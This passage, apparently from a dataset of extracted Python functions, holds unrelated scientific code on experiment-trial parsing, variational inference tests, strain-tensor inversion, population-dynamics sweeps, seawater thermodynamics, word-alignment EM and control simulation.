int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def _r_inv(self):\n raise NotImplementedError", "def calc_T_sys(nu_obs):\n return 100 * u.K + 120 * (nu_obs / (150 * u.MHz))**(-2.55) * u.K", "def run_test(d):\n\n ######### Problem Specification\n\n # Data generation parameters\n prior_mu_z = np.zeros(d, dtype=np.float32) # Prior mean\n prior_sigma_z = np.eye(d, dtype=np.float32) # Prior covariance matrix\n\n # True model parameters\n num_range = np.arange(-(d-1)/2, (d+1)/2, dtype=np.float32)\n\n t_delta = num_range / 5 \n\n if d == 1:\n t_sigma = np.ones(1)\n else: \n # Allow sigma to range from 0.1 to 1\n t_sigma = 36/(10*(d-1)**2) * num_range**2 + 0.1 \n\n ######### Variable Initialization\n\n # Initial model parameters - same across all methods\n init_delta = prior_mu_z.copy()\n init_log_sigma = 3 * np.ones(d)\n\n # Initial HVAE variational parameters\n init_T = 5.\n init_eps = 0.005 * np.ones(d)\n max_eps = params['max_eps'] * np.ones(d)\n init_logit_eps = np.log(init_eps/(max_eps - init_eps))\n init_log_T_0 = np.log(init_T - 1)\n\n # Initial NF variational parameters\n init_u_pre_reparam = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_w = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_b = 0.1\n\n # Initial VAE parameters\n init_mu_z = prior_mu_z.copy()\n init_log_sigma_z = np.ones(d)\n\n ######### Set up models\n\n HVAE_model_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_1', d, params['HVAE_K_1'])\n HVAE_model_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_2', d, params['HVAE_K_2'])\n\n HVAE_model_notemp_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'],\n [init_delta, init_log_sigma, init_logit_eps], \n 'HVAE_notemp_1', d, params['HVAE_K_1'])\n HVAE_model_notemp_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'], \n [init_delta, init_log_sigma, init_logit_eps],\n 'HVAE_notemp_2', d, params['HVAE_K_2'])\n\n NF_model_1 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_1', d, params['NF_K_1'])\n NF_model_2 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_2', d, params['NF_K_2'])\n\n VB_model = VB(['delta', 'log_sigma', 'mu_z', 'log_sigma_z'], \n [init_delta, init_log_sigma, init_mu_z, init_log_sigma_z], 'VB', d)\n\n model_list = [HVAE_model_1, HVAE_model_2, HVAE_model_notemp_1, \n HVAE_model_notemp_2, NF_model_1, NF_model_2, VB_model]\n \n ######### Generate Training Data & Save - One for each test\n\n train_data_list = []\n\n for i in range(params['n_tests']):\n z = np.random.multivariate_normal(prior_mu_z, prior_sigma_z)\n x = np.random.multivariate_normal(z + t_delta, np.diag(t_sigma**2), \n size=params['n_data'])\n train_data_list.append(x)\n\n # Folder should have already been created in the initializations\n data_path = os.path.join('save', str(d), 'train_data.p')\n pickle.dump(train_data_list, open(data_path, 'wb')) \n\n ######### Train models\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n # Store the final parameter values for all test runs in this dictionary\n final_params = {}\n\n for m in model_list:\n\n final_values = []\n\n for i in range(params['n_tests']):\n (delta, sigma) = m.train(sess, train_data_list[i], i)\n final_values.append((delta, sigma))\n\n final_params[m.model_name] = final_values.copy()\n\n ######### Test models using difference between parameters\n\n param_diffs = {}\n\n for m in model_list:\n\n diffs = []\n\n for i in range(params['n_tests']):\n delta = final_params[m.model_name][i][0]\n sigma = final_params[m.model_name][i][1]\n\n delta_diff = np.sum((delta - t_delta)**2)\n sigma_diff = np.sum((sigma - t_sigma)**2)\n\n diffs.append((delta_diff, sigma_diff))\n\n param_diffs[m.model_name] = diffs.copy()\n\n # Save parameter differences in a pickle file\n diff_path = os.path.join('save', str(d), 'all_diffs.p')\n pickle.dump(param_diffs, open(diff_path, 'wb'))", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def mscb(t):\n\treturn int(np.log2(t ^ (t + 1)))", "def FigA7(case):\n \n #set the parameter, arrays\n \n n_array=np.array([1,2,3])\n\n #set the result arrays\n if case==0:\n class_number=5\n elif case==1:\n class_number=6\n fate=np.zeros([class_number])#number of evolutionary fate\n fate_matrix=np.zeros([np.size(n_array),np.size(fate)])\n \n time=np.linspace(0,100000, 1000000)\n loop=10**6\n \"\"\"\n 0 Co and/or Ch cannot survive in mono-culture\n 1 Co cannot invade\n 2 Only equilibrium of exclusion is stable\n 3 Only equilibrium of coexistence is stable\n 4 Two equilibria are UNstable\n 5 two Equilibrium are stable (which may occur only when sCO vs rCh)\n \"\"\"\n for tri in range(np.size(n_array)):\n counter=0\n n=n_array[tri]\n print(str(\"Hill coefficient is %d\" %(n)))\n fate=np.zeros([class_number])#number of evolutionary fate should be reset\n if case==0 or case==1:\n fname=str('parameter-sweep-MC-n%d-case%d' %(n, case))\n else:\n print(\"Error in case\")\n return 1\n \n for i in range(loop):\n if(i+1)%10000==0:\n print(i+1)\n Ks,cd,T0, alpha,=np.random.uniform(0,1,4)\n Kr,cr=np.random.uniform([Ks,0],[1,1],2)#Kr>Ks and cr.cd\n #check whether r is positive or not\n if case==0:\n r1=rmax*(1-cr-cd)#rCO\n r2=rmax#sCH\n W0Co=r1-dmax*T0**n/(T0**n+Kr**n)-alpha#initial growth of Cooperator\n W0Ch=r2-dmax*T0**n/(T0**n+Ks**n)-alpha#initial growth of Cheater\n elif case==1:\n r1=rmax*(1-cd)#sCo\n r2=rmax*(1-cr)#rCh\n W0Co=r1-dmax*T0**n/(T0**n+Ks**n)-alpha\n W0Ch=r2-dmax*T0**n/(T0**n+Kr**n)-alpha\n stab_e=0#initialize the falgs of stability\n stab_c=0\n if W0Co<0 or W0Ch<0:\n fate[0]+=1\n res=0\n else:\n #succeed in mono-culture \n init=np.array([T0,10**(-6)])\n if case==0: \n solCo=odeint(DyCoop, init, time, args=(T0, r1, Kr, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Ks, alpha, n))\n x2s=solCh[-1,1]\n else:\n solCo=odeint(DyCoop, init, time, args=(T0, r1, Ks, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Kr, alpha, n))\n x2s=solCh[-1,1]\n \n #Evolutionary dynamics \n if case==0:\n K=Kr\n else:\n K=Ks\n if r1*(1-x2s)-dmax*T0**n/(T0**n+K**n)<alpha:\n #Co cannot invade\n fate[1]+=1\n res=1\n else:\n #Co can invade\n #calculate Tdagger Td and check whether coexist or exclude\n if case==0:\n #rCo vs sCh\n #in this case, at most one equilbrium is stable\n tau=Quad(case,alpha,cr+cd,0,Kr, Ks, n)\n Td=tau**(1/n)\n if Td<Ts:\n #Co exclude Ch\n fate[2]+=1\n res=2\n else:\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #unstable coexistence nor exclusion\n fate[4]+=1\n res=4\n print(Td, x1d, x2d)\n else:\n #sCo vs rCh\n # in this case two equilibria can be stable at the same time\n [tau_p,tau_m]=Quad(case,alpha,cd,cr,Ks, Kr, n)\n if tau_m>Ts**n or tau_p<Ts**n:\n # cexclusion is stable\n stab_e=1\n # stability in coexistence \n if tau_p<0:\n stab_c=0\n else:\n Td=tau_p**(1/n)\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n stab_c=1\n #classify\n if stab_e==1 and stab_c==1:\n # two stable equilbria\n fate[5]+=1\n res=5\n elif stab_e==1 and stab_c==0:\n #only stable cexclusion\n fate[2]+=1\n res=2\n elif stab_e==0 and stab_c==1:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #both unstable\n fate[4]+=1\n res=4\n \n #save the results\n if counter==0:\n result=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n #save the result with parameter values\n \n else:\n #add array of results\n R=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n result=np.concatenate((result, R), axis=0)\n counter+=1\n \n #save csv file and graph\n np.savetxt(fname+'.csv',result, delimiter=',', header='Ks, Kr, cr, cd, alpha, T0, class', fmt='%.6f') \n print(fate)\n fate_matrix[tri,:]=fate \n if case==0: \n np.savetxt('parameter_sweep_MC_total_case0.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4', fmt='%d')\n else:\n np.savetxt('parameter_sweep_MC_total_case1.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4,cl5', fmt='%d')\n Plot(case)", "def prove_I0() -> Proof:\n # Task 4.8", "def t(l3,Ei,Et,Et_axis):\n Ef=Ei-Et\n T=(-(l3/vFrmE(Ef))+(l3/np.sqrt(vFrmE(Ei)**2-vsq_from_E(Et_axis))))*1e6\n return (T)", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def main() -> int:\n ucvm_out = \"\"\n for j in frange(CORNERS[\"bl\"][\"n\"], CORNERS[\"ur\"][\"n\"], SPACING):\n for i in frange(CORNERS[\"bl\"][\"e\"], CORNERS[\"ur\"][\"e\"] + SPACING, SPACING):\n ucvm_out += \"%.2f %.2f 0\\n\" % (i, j)\n os.chdir(\"/Users/davidgil/ucvm-15.10.0/bin\")\n proc = Popen(\n [\"./ucvm_query\", \"-f\", \"../conf/ucvm.conf\"], stdout=PIPE, stdin=PIPE, stderr=STDOUT\n )\n out_arr = np.zeros(\n shape=(\n int((CORNERS[\"ur\"][\"n\"] - CORNERS[\"bl\"][\"n\"]) / SPACING) + 2,\n int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING) + 2\n )\n )\n output = proc.communicate(input=ucvm_out.encode(\"ASCII\"))[0]\n i = 0\n j = 0\n for line in output.decode(\"ASCII\").split(\"\\n\")[2:-1]:\n line_split = line.split()\n try:\n out_arr[j][i] = float(line_split[4])\n except IndexError:\n print(line_split)\n if i == int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING):\n i = 0\n j += 1\n else:\n i += 1\n np.save(\"vs30.dat\", out_arr)\n return 0", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def calc_equil(sst, ft_qv, use_NT=False):\n \n run_main(sst, ft_qv, use_NT)\n \n # grab csv file\n with open('dumpmodel.csv','r') as f:\n df_result=pd.read_csv(f)\n\n # last time step into named tupple\n out=df_result.iloc[-1]\n steady_state=make_tuple(out.to_dict())\n steady_state\n \n # obtain steady-state values\n dth=steady_state.deltheta\n dqt=steady_state.delqv\n thetal_m=steady_state.theta\n qt_m=steady_state.qv\n h=steady_state.h\n press=tf.find_press(steady_state.h) #kPa\n thetal_ft = steady_state.theta + dth\n qt_ft = steady_state.qv + dqt\n zb = steady_state.LCL\n zi = steady_state.h\n we = steady_state.went\n \n # calculate thetal at z = 3000 m (take qt(z = 3000m) = qt(z = h), so delta_qt = dqt)\n gamma = 6e-3 \n thetal_3000 = thetal_ft + gamma*(3000-h)\n LTS = thetal_3000 - steady_state.theta\n \n # calculate delta_Fr\n delta_Frstar = 82.0 # Wm^-2\n Frlambda = 7.9 # Wm^-2, using with CTL from Gesso\n delta_Fr = delta_Frstar - Frlambda*qt_ft*1000 # convert qt_ft to g kg^-1\n\n # calculate LWP\n rho = 1.\n LWP = 0.5*rho*(zi-zb)**2\n \n # put all required variables into output array\n out_array = np.array([thetal_m, qt_m, zi, zb, we, LWP, delta_Fr, LTS, dqt])\n \n return out_array", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def simulation_OFC(self,ncmE,ncmC,f,g,Cfun,h,dt,tf,x0,z0=None,dscale=10.0,\\\n xnames=\"num\",Ncol=1,FigSize=(20,10),FontSize=20,phis=None):\n \"\"\"\n \n \n 1) SIMULATION\n \n \n \"\"\"\n if len(sig(f).parameters) == 1:\n fun1 = f\n f = lambda x,p: fun1(x)\n if len(sig(g).parameters) == 1:\n fun2 = g\n g = lambda x,p: fun2(x)\n if len(sig(Cfun).parameters) == 1:\n fun3 = Cfun\n Cfun = lambda x,p: fun3(x)\n if len(sig(h).parameters) == 1:\n fun4 = h\n h = lambda x,p: fun4(x)\n print(\"========================================================\")\n print(\"====================== SIMULATIOM ======================\")\n print(\"========================================================\")\n if dt <= self.dt_rk:\n self.dt_rk = dt\n self.Nrk = int(dt/self.dt_rk)\n Nsim = int(tf/dt)\n np.set_printoptions(precision=1)\n print(\"time step =\",dt)\n print(\"terminal time =\",tf)\n print(\"initial state =\",x0)\n print(\"estimated initial state =\",z0)\n funx = lambda x,p,dEf: f(x,p)+dEf(x,p)\n z = z0\n zhis = np.zeros((Nsim+1,self.n))\n zhis[0,:] = z\n x = x0\n xhis = np.zeros((Nsim+1,self.n))\n xhis[0,:] = x\n tit1 = \"Performance of NCM-based Output Feedback (1)\"\n tit2 = \"Performance of NCM-based Output Feedback (2)\"\n tit3 = \"Performance of NCM-based Output Feedback (3)\"\n tit4 = \"Performance of NCM-based Output Feedback (4)\"\n ly = r\"estimation error: $\\|x-\\hat{x}\\|_2$\"\n l1 = r\"estimation error\"\n lyb = r\"tracking error: $\\|x-x_d\\|_2$\"\n l1b = r\"tracking error\"\n bNam1 = \"=================== ESTIMATION ERROR ===================\"\n bNam2 = \"============ ESTIMATION ERROR OF EACH STATE ============\"\n bNam3 = \"==================== Tracking ERROR ====================\"\n bNam4 = \"============= Tracking ERROR OF EACH STATE =============\"\n l2 = r\"optimal steady-state upper bound\"\n if phis == None:\n phis = np.linspace(self.plims[0,:],self.plims[1,:],Nsim)\n for k in range(Nsim):\n p = phis[k,:]\n Mc = ncmC.ncm(z,p)\n u = -g(z,p).T@Mc@z\n dEfC = lambda x,p: g(x,p)@u\n d1 = self.unifrand2(ncmC.d1_over,np.size(ncmC.Bw(x,p),1))*dscale\n x = self.rk4(x,p,dEfC,funx)+ncmC.Bw(x,p)@d1*dt\n xhis[k+1,:] = x\n Me = ncmE.ncm(z,p)\n Cx = Cfun(z,p)\n Lx = Me@Cx.T\n #Lx = K.T\n d2 = self.unifrand2(ncmE.d2_over,np.size(ncmE.Gw(x,p),1))*dscale\n y = h(x,u,p)+ncmE.Gw(x,p)@d2\n funz = lambda z,p,dEf: f(z,p)+g(z,p)@u+dEf(z,p)\n dEfE = lambda z,p: Lx@(y-h(z,u,p))\n z = self.rk4(z,p,dEfE,funz)\n zhis[k+1,:] = z\n this = np.linspace(0,tf,Nsim+1)\n \"\"\"\n \n \n 2) FIGURE GENERATION\n \n \n \"\"\"\n print(\"========================================================\")\n print(bNam1)\n print(\"========================================================\")\n matplotlib.rcParams.update({\"font.size\": 15})\n matplotlib.rc(\"text\",usetex=True)\n plt.figure()\n plt.plot(this,np.sqrt(np.sum((xhis-zhis)**2,1)))\n plt.plot(this,np.ones(np.size(this))*ncmE.Jcv_opt)\n plt.xlabel(r\"time\",fontsize=FontSize)\n plt.ylabel(ly,fontsize=FontSize)\n plt.legend([l1,l2],loc=\"best\")\n plt.title(tit1,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(bNam2)\n print(\"========================================================\")\n Nrow = int(self.n/Ncol)+np.remainder(self.n,Ncol)\n fig,ax = plt.subplots(Nrow,Ncol,figsize=FigSize)\n plt.subplots_adjust(wspace=0.25,hspace=0.25)\n if Ncol == 1:\n ax = np.reshape(ax,(self.n,1))\n elif Nrow == 1:\n ax = np.reshape(ax,(1,self.n))\n if xnames == \"num\":\n xnames = []\n for i in range(self.n):\n xnames += [r\"state \"+str(i+1)]\n for row in range(Nrow):\n for col in range(Ncol):\n i = Ncol*row+col\n if i+1 <= self.n:\n ax[row,col].plot(this,xhis[:,i]-zhis[:,i])\n ax[row,col].set_xlabel(r\"time\",fontsize=FontSize)\n LabelName = r\"estimation error: \"+xnames[i]\n ax[row,col].set_ylabel(LabelName,fontsize=FontSize)\n fig.suptitle(tit2,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(bNam3)\n print(\"========================================================\")\n matplotlib.rcParams.update({\"font.size\": 15})\n matplotlib.rc(\"text\",usetex=True)\n plt.figure()\n plt.plot(this,np.sqrt(np.sum((xhis)**2,1)))\n plt.plot(this,np.ones(np.size(this))*ncmC.Jcv_opt)\n plt.xlabel(r\"time\",fontsize=FontSize)\n plt.ylabel(lyb,fontsize=FontSize)\n plt.legend([l1b,l2],loc=\"best\")\n plt.title(tit3,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(bNam4)\n print(\"========================================================\")\n Nrow = int(self.n/Ncol)+np.remainder(self.n,Ncol)\n fig,ax = plt.subplots(Nrow,Ncol,figsize=FigSize)\n plt.subplots_adjust(wspace=0.25,hspace=0.25)\n if Ncol == 1:\n ax = np.reshape(ax,(self.n,1))\n elif Nrow == 